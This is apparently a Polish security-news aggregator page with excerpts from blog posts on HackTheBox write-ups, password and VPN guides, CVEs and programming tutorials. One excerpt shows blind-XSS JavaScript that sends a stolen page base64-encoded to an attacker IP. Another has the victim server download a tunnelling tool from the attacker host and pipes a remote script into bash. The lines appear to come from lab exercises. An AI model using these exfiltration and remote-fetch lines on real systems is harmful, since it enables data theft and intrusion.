Serwisy SEC
ARP poisoining + AS-REQ cracking
3 lat temu
Dzień dobry. Dziś chciałbym poruszyć temat bezpieczeństwa sieci lokalnych i pokazać jeden z kilku tzw. low-hanging fruits, po które łatwo sięgnąć gdy znajdziemy się już w interesującym dla nas segmencie sieci: LLMNR NBNS (NetBIOS Name Service) ARP po...
Fastify + Hotwire - nowy (lepszy?) pomysł na front...
3 lat temu
Obstawiam, iż 90% aktualnie tworzonych aplikacji opiera się na podział frontend, backend i przesył danych pomiędzy nimi w postaci JSON'a. Frontend prosi o dane i gdy je otrzymuje, to odpowiednio modyfikuje wygląd strony. A może można przesyłać coś in...
Czemu, jak wpisuję błędne hasło przy logowaniu do ...
3 lat temu
Na przeczytanie potrzebujesz 3 minut(y). Nasza czytelniczka Magda (imię zmienione) korzysta z bankowości internetowej jednego z polskich banków. Zgodnie z naszymi radami używa skomplikowanego, unikalnego hasła i dwuskładnikowego uwierzytelnienia(PUSH...
Co to jest VPN? 8 porad jak wybrać VPN, aby być be...
3 lat temu
Kompendium wiedzy o VPN: Co to jest? Jak działa? Dlaczego warto używać VPN? Jak wybrać odpowiedni VPN? + dodatkowo moja rekomendacja najlepszego VPN-a.
Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170...
3 lat temu
Cześć ? Poniższy wpis stanowi kontynuację poprzedniego artykułu o Windows Defenderze. W poprzednim artykule udało się nam doprowadzić do sytuacji w której możemy swobodnie usuwać zawartości wybranych przez nas folderów. W tym odcinku postaramy się pó...
Nowa wersja programu Arcabit
3 lat temu
Trochę to trwało, mnóstwo programisto-testero-roboczogodzin upłynęło, ale już jest - całkowicie nowa wersja programu Arcabit.Udostępniliśmy również mechanizm szybkiej, automatycznej migracji do najnowszej wersji. Zachęcamy do zapoznania się z nową we...
10 lat więzienia dla cyberprzestępcy z grupy FIN7
3 lat temu
Wydano wyrok na 35-latka pochodzenia ukraińskiego, który był członkiem zorganizowanej grupy cyberprzestępczej FIN7. Wyrok to 10 lat pozbawienia wolności. Dodatkowo sędzia nakazał zapłacić 2,5 miliona dolarów odszkodowania. Grupa, w której uczestniczy...
Co z Rębaczami?
3 lat temu
Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?
3 lat temu
Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?
3 lat temu
Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Sprawdź, czy wyciekł twój telefon
3 lat temu
W weekend świat obiegła informacja, iż dostępna komercyjnie (i w darknecie) baza danych użytkowników Facebooka, zawierająca 533 milionów rekordów, została umieszczona za darmo w sieci. Zawierająca podstawowe informacje użytkowników baza ….
Rozmowa kontrolowana #53. Wywiad dla Z3S
3 lat temu
W świąteczną niedzielę redaktorzy serwisu Zaufana Trzecia Strona – Adam Haertle i Adam Lange – przeprowadzili wielotematyczną rozmowę z Pawłem Wilkiem. Można posłuchać i pooglądać odpowiedzi dotyczących programowania zorientowanego na dane, eDiscover...
Menedżer haseł: wszystko, co musisz wiedzieć o bez...
3 lat temu
Jak zabezpieczyć swoje hasła przy pomocy menedżera haseł? Jak działają menedżery, co oferują, jak ich używać, który wybrać? Sprawdzam.
Infrastruktura IT dla Domu Maklerskiego – case stu...
3 lat temu
Sprawdź jakie środowisko IT przygotowaliśmy dla jednego z największych graczy w branży finansowej.
Handling Celery events (EN)
3 lat temu
The code used in this article was written for Celery 5.0.5 but it should work with older versions as well (4.1.1 and higher). It’s available on GitHub. According to the Celery official documentation, a worker is able to generate...
Blind XSS Data Exfiltration
3 lat temu
cat 2.js var xhr=new XMLHttpRequest(); xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false); xhr.send();var xhr2=new XMLHttpRequest(); xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false); xhr2.send(); └...
Firestore - tworzenie, modyfikowanie i usuwanie da...
3 lat temu
Przy bazie danych równie istotne, jak pobieranie danych, jest również ich tworzenie. Do podstawowych operacji możemy zaliczyć tworzenie, edycję i usuwanie dokumentów oraz kolekcji. W przypadku Firestore jest kilka rozwiązań, które mogą zdziwić. Szcze...
Twoje hasła w końcu bezpieczne! Poradnik bezpiecze...
3 lat temu
Jak stworzyć silne, mocne i trudne do złamania hasło? Poznaj TOP 100 najpopularniejszych haseł w Polsce. Dowiedz się, jak łamane są hasła. Czy mierniki i testery siły hasła działają? Po co Ci kostka do gry i dlaczego musisz pamiętać...
Jak zrobić DDOS na ETH?
3 lat temu
Jak zrobić DDOS na ETH?
3 lat temu
Writeup: Maszyna HackTheBox Doctor
3 lat temu
1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.209 3. Skanowanie i rozpoznanie Na początku uruchomiłem skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najbardziej pop...
New Cheatsheet XSS 2021
3 lat temu
https://netsec.expert/posts/xss-in-2021/
Wyjątki. Czego unikać?
3 lat temu
Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
Wyjątki. Czego unikać?
3 lat temu
Java pozwala nam na używanie wyjątków do czego sobie zapragniemy. Jako developerzy wiemy natomiast, iż wyjątki służą do sytuacji wyjątkowych i mamy do nich jakiś szacunek. Jednak, kiedy przychodzi do zaprojektowania pewnej części systemu zdarza nam s...
Writeup: Maszyna HackTheBox Worker
3 lat temu
1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.203 3. Skanowanie i rozpoznanie Na początku użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Windows/Worker] └──╼...
Writeup: Maszyna HackTheBox Omni
3 lat temu
1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.204 3. Skanowanie i rozpoznanie Na początek użyłem narzędzia nmap do identyfikacji otwartych portów: ┌─[t4wny0wl@whitehatlab]─[~/ctf/hackthebox/Machines/Other/Omni] └──╼ $nm...
TCP/UDP reverse tunnel, transported over HTTP, sec...
3 lat temu
#### CHISEL INSTALL curl https://i.jpillora.com/chisel! | bash ## copy to victim server: www-data@passage:/tmp$ wget http://10.10.14.143/chisel wget http://10.10.14.143/chisel --2021-01-25 08:55:34-- http://10.10.14.143/chisel Connecting to 10.10.1...
Red Team Notes 2.0
3 lat temu
https://dmcxblue.gitbook.io/red-team-notes-2-0/
Pihole – Cert Hole itp
4 lat temu
DNS Hole od kilkunastu lat jest wykorzystywane do wielu celów. Zwykle do blokowania reklam na portalach, usług śledzących itp. Jednakże dożyliśmy takich czasów, iż DNS Hole coraz częściej wykorzystywane jest do zapewnienia bezpieczeństwa użytkownikó...
Redis. Wprowadzenie Dla Początkujących
4 lat temu
Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Redis. Wprowadzenie Dla Początkujących
4 lat temu
Redis jest popularnym projektem open sourcowym, który od roku 2013 zyskuje coraz to większą i większą rozpoznawalność w światku IT. Dziś, w roku 2021, Redis jest znany jako NoSQL-owa baza danych klucz-wartość działająca w pamięci, a jej najpopularnie...
Serwery dla integratora systemu ERP enova365 – cas...
4 lat temu
Systemy ERP są krwioobiegiem nowoczesnej firmy, żeby działały w sposób optymalny muszą dysponować odpowiednią infrastrukturą - sprawdź jakie środowisko przygotowaliśmy dla integratora COM@COM.
Pihole – regexp
4 lat temu
Jeśli ktoś korzysta z PiHole to podaję swoje regexp. Opracowane na podstawie własnych analiz ruchu itp. Domeny wyłapane w ruchu ISP Debacom Zabrze: [0-9a-za-z]{13-18}\.tickets [0-9a-za-z]{13-18}\.blackfriday v1\.[a-uw-z]{7}\.ru v[12]{1}\.[a-uw-z]{7}\...
Random:view #003 – Crosscast Cyber, Cyber… 113: Ro...
4 lat temu
Rozmowa Mirosława Maja i Łukasza Jachowicza z Pawłem Wilkiem na temat reverse engineeringu szczepionki przeciwko SARS-CoV-2 w ramach podcastu Cyber, Cyber… Fundacji Bezpieczna Cyberprzestrzeń.
MAC address c8:93:46 – ZeverSolar
4 lat temu
Robiłem porządki w swojej sieci domowej. Napotkałem na problem, adres mac: c8:93:46:36:10:1c Gadatliwe to nie było, porty pozamykane. MAC address określał producenta: "MXCHIP Company Limited" Wiele to nie dało, poza tym iż trop kierował na IoT. Poni...
Kalendarium - przegląd wydarzeń z 2020 roku
4 lat temu
2020 rok już za nami, dlatego zdecydowaliśmy się przypomnieć naszym czytelnikom niektóre ważne wydarzenia dotyczące służb specjalnych oraz branży IT, tworząc mini kalendarium 2020 roku:
Ataki AIR-FI. RAM jako nadajnik radiowy
4 lat temu
Szyny danych w pamięciach RAM współczesnych komputerów osiągnęły takie częstotliwości pracy, iż możliwe jest używanie ich w roli nadajników radiowych, a co za tym idzie wykorzystywanie do wykradania danych, choćby wtedy, gdy komputer jest odłączony o...
PfSense – repo oficjalne BSD
4 lat temu
/etc/pkg/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/FreeBSD.conf –> ustaw enabled na yes /usr/local/etc/pkg/repos/pfSense.conf –> ustaw enabled na yes.
Reverse engineering kodu źródłowego szczepionki. B...
4 lat temu
Witaj! W tym poście będziemy przyglądali się znak po znaku kodowi źródłowemu szczepionki BioNTech / Pfizer SARS-CoV-2 mRNA.
POIT 099: Podsumowanie 2020
4 lat temu
Witam w dziewięćdziesiątym dziewiątym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest podsumowanie roku 2020.Dziś moim gościem jest Grzegorz Kotfis – programista z wieloletnim doświadczeniem najsilniej związany z technologią ....
Writeup: Maszyna HackTheBox SneakyMailer
4 lat temu
1. TLDR 2. Przygotowanie Przygotowałem przydatne zmienne: export IP=10.10.10.197 3. Skanowanie i rozpoznanie Na początku uruchomiłem skanowanie narzędziem nmap w celu ujawnienia i identyfikacji usług, które zostały uruchomione na 1000 najbardziej pop...
Intercept http2 (grpc) in BURP SUITE PROXY
4 lat temu
as root: iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080 adduser mitmproxyuser cat /etc/nghttpx/nghttpx.conf (downstream config) frontend=0.0.0.0,8080;no-tls backend=127....
Forward local connections to local BURP PROXY / MI...
4 lat temu
0) sysctl -w net.ipv4.ip_forward=1 sysctl -w net.ipv6.conf.all.forwarding=1sysctl -w net.ipv4.conf.all.send_redirects=0 1) iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d dst_ip -j REDIRECT --to-port 8080 2) useradd --cr...
Virtualbox + 4k (3840x2160) resolution on guest
4 lat temu
PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe setextradata global GUI/MaxGuestResolution "3840,2160" PS C:\Program Files\Oracle\VirtualBox> .\VBoxManage.exe getextradata global GUI/MaxGuestResolution Value: 3840,2160 PS C:\Program Fil...
Środowisko IT do monitorowania Ziemi – case study ...
4 lat temu
"Fly me to the moon..." - zrobiliśmy to, pozyskaliśmy pierwsze zlecenie w kosmosie. Zobacz jak współpracujemy z Europejską Agencją Kosmiczną.
Lista popularnych wyszukiwarek i narzędzi do rekon...
4 lat temu
Elegancka lista 😉 https://zwirek.eu/2020/11/25/wyszukiwarki/ .
Popularne
Mocny telewizor Mini LED od Hisense w ekstra promocji!
3 dni temu
63
Ta zmiana w Sklepie Play może uniemożliwić Ci bombardowanie ...
1 tydzień temu
58
English (US) · 
Polish (PL) · 
Russian (RU) · © Telefony i Tablety 2025. Wszelkie prawa zastrzeżone.